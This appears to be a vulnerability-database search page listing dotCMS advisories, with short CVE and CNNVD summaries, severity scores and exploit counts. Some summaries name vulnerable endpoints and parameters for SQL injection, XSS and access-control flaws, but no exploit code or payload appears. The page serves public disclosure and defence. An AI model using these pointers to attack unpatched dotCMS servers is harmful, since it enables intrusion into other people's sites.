Lucene search
K

519 matches found

RedhatCVE
RedhatCVE
added 2025/05/22 3:54 p.m.6 views

CVE-2020-18875

Incorrect Access Control in DotCMS versions before 5.1 allows remote attackers to gain privileges by injecting client configurations via vtl velocity files...

8.8CVSS7.3AI score0.01983EPSS
Exploits0
RedhatCVE
RedhatCVE
added 2025/05/22 3:30 p.m.5 views

CVE-2020-35274

DotCMS Add Template with admin panel 20.11 is affected by cross-site Scripting XSS to gain remote privileges. An attacker could compromise the security of a website or web application through a stored XSS attack and stealing cookies using XSS...

4.8CVSS5.6AI score0.00612EPSS
Exploits1
RedhatCVE
RedhatCVE
added 2025/05/22 3:28 p.m.7 views

CVE-2020-27848

dotCMS before 20.10.1 allows SQL injection, as demonstrated by the /api/v1/containers orderby parameter. The PaginatorOrdered classes that are used to paginate results of a REST endpoints do not sanitize the orderBy parameter and in some cases it is vulnerable to SQL injection attacks. A user mus...

8.8CVSS7.6AI score0.01223EPSS
Exploits1
RedhatCVE
RedhatCVE
added 2025/05/22 8:3 a.m.7 views

CVE-2019-12872

dotCMS before 5.1.6 is vulnerable to a SQL injection that can be exploited by an attacker of the role Publisher via viewunpushedbundles.jsp...

7.2CVSS7.8AI score0.01276EPSS
Exploits0References1
RedhatCVE
RedhatCVE
added 2025/05/22 7:57 a.m.6 views

CVE-2018-16980

dotCMS V5.0.1 has XSS in the /html/portlet/ext/contentlet/imagetools/index.jsp fieldName and inode parameters...

6.1CVSS6.1AI score0.00843EPSS
Exploits1References1
RedhatCVE
RedhatCVE
added 2025/05/22 6:29 a.m.9 views

CVE-2016-4040

SQL injection vulnerability in the Workflow Screen in dotCMS before 3.3.2 allows remote administrators to execute arbitrary SQL commands via the orderby parameter...

7.2CVSS8.6AI score0.01327EPSS
Exploits2References1
RedhatCVE
RedhatCVE
added 2025/05/22 5:43 a.m.4 views

CVE-2017-15219

The dotCMS 4.1.1 application is vulnerable to Stored Cross-Site Scripting XSS affecting a vanity-urls Title field, a containers Description field, and a templates Description field...

5.4CVSS4.9AI score0.00513EPSS
Exploits1References1
Positive Technologies
Positive Technologies
added 2024/07/26 12:0 a.m.10 views

PT-2024-31161

Name of the Vulnerable Software and Affected Versions Software versions prior to 24.07.12 Software versions 23.01.20 LTS through 23.01.19 LTS Software versions 23.10.24v13 LTS and earlier Software versions 24.04.24v5 LTS and earlier Description The issue arises in the System → Maintenance tool,...

9.9CVSS5.9AI score0.00477EPSS
Exploits0References6
CNNVD
CNNVD
added 2024/07/26 12:0 a.m.5 views

DotCMS 安全漏洞

DotCMS is an open source content management system written in Java by DotCMS, Inc. for managing content and content-driven sites and applications. A security vulnerability exists in DotCMS. An attacker exploiting the vulnerability could mimic other users by session ID...

4.9CVSS6.7AI score0.00477EPSS
Exploits0References2
CNNVD
CNNVD
added 2024/07/25 12:0 a.m.5 views

DotCMS 安全漏洞

DotCMS is an open source content management system written in Java by DotCMS, Inc. for managing content and content-driven sites and applications. A security vulnerability exists in DotCMS that originates from a URL parameter in the login page for resetting a password that can inject HTML code...

6.1CVSS6.7AI score0.00239EPSS
Exploits0References2
NVD
NVD
added 2024/04/01 10:15 p.m.16 views

CVE-2024-3164

In dotCMS dashboard, the Tools and Log Files tabs under System → Maintenance Portlet, which is and always has been an Admin portlet, is accessible to anyone with that portlet and not just to CMS Admins. Users that get site admin but not a system admin, should not have access to the System...

4.5CVSS4.7AI score0.00469EPSS
Exploits0References3
OSV
OSV
added 2024/04/01 10:15 p.m.4 views

CVE-2024-3164

In dotCMS dashboard, the Tools and Log Files tabs under System → Maintenance Portlet, which is and always has been an Admin portlet, is accessible to anyone with that portlet and not just to CMS Admins. Users that get site admin but not a system admin, should not have access to the System...

4.5CVSS7.1AI score
Exploits0References3
Cvelist
Cvelist
added 2024/04/01 9:38 p.m.25 views

CVE-2024-3165 Database Credential Exposure in the Logs

System-Maintenance- Log Files in dotCMS dashboard is providing the username/password for database connections in the log output. Nevertheless, this is a moderate issue as it requires a backend admin as well as that dbs are locked down by environment. OWASP Top 10 - A05 Insecure Design OWASP Top...

4.5CVSS5.1AI score0.00495EPSS
Exploits0References3
Vulnrichment
Vulnrichment
added 2024/04/01 9:38 p.m.10 views

CVE-2024-3165 Database Credential Exposure in the Logs

System-Maintenance- Log Files in dotCMS dashboard is providing the username/password for database connections in the log output. Nevertheless, this is a moderate issue as it requires a backend admin as well as that dbs are locked down by environment. OWASP Top 10 - A05 Insecure Design OWASP Top...

4.5CVSS6.9AI score0.00495EPSS
Exploits0References3
CVE
CVE
added 2024/04/01 9:38 p.m.44 views

CVE-2024-3165

CVE-2024-3165 affects dotCMS where the System->Maintenance-> Log Files output reveals database credentials (username/password) in logs. This is described as a moderate issue requiring backend admin access and environment-led DB lockdown. Connected documents confirm the vulnerability stems f...

4.5CVSS4.7AI score0.00495EPSS
Exploits0References3Affected Software1
Cvelist
Cvelist
added 2024/04/01 9:27 p.m.23 views

CVE-2024-3164

In dotCMS dashboard, the Tools and Log Files tabs under System → Maintenance Portlet, which is and always has been an Admin portlet, is accessible to anyone with that portlet and not just to CMS Admins. Users that get site admin but not a system admin, should not have access to the System...

4.5CVSS5.1AI score0.00469EPSS
Exploits0References3
Vulnrichment
Vulnrichment
added 2024/04/01 9:27 p.m.11 views

CVE-2024-3164

In dotCMS dashboard, the Tools and Log Files tabs under System → Maintenance Portlet, which is and always has been an Admin portlet, is accessible to anyone with that portlet and not just to CMS Admins. Users that get site admin but not a system admin, should not have access to the System...

4.5CVSS4.7AI score0.00469EPSS
Exploits0References3
CVE
CVE
added 2024/04/01 9:27 p.m.46 views

CVE-2024-3164

The CVE-2024-3164 issue affects dotCMS where the Tools and Log Files tabs under System → Maintenance Portlet are accessible to any user with the portlet, not just CMS Admins. The vulnerability arises from broken access control, allowing site-admin users (without system-admin privileges) to access...

4.5CVSS4.7AI score0.00469EPSS
Exploits0References3Affected Software1
CNNVD
CNNVD
added 2024/04/01 12:0 a.m.3 views

DotCMS 安全漏洞

DotCMS is an open source content management system written in Java by DotCMS, Inc. for managing content and content-driven sites and applications. A security vulnerability exists in DotCMS that originates in the log files that provide usernames and passwords for database connections...

4.5CVSS6.8AI score0.00495EPSS
Exploits0References4
CNNVD
CNNVD
added 2024/04/01 12:0 a.m.4 views

dotCMS 安全漏洞

DotCMS is an open source content management system written in Java by DotCMS, Inc. for managing content and content-driven sites and applications. A security vulnerability exists in dotCMS that stems from the fact that any user with portlet privileges can access the Tools and Log Files tabs under...

4.5CVSS6.7AI score0.00469EPSS
Exploits0References4
Rows per page
Query Builder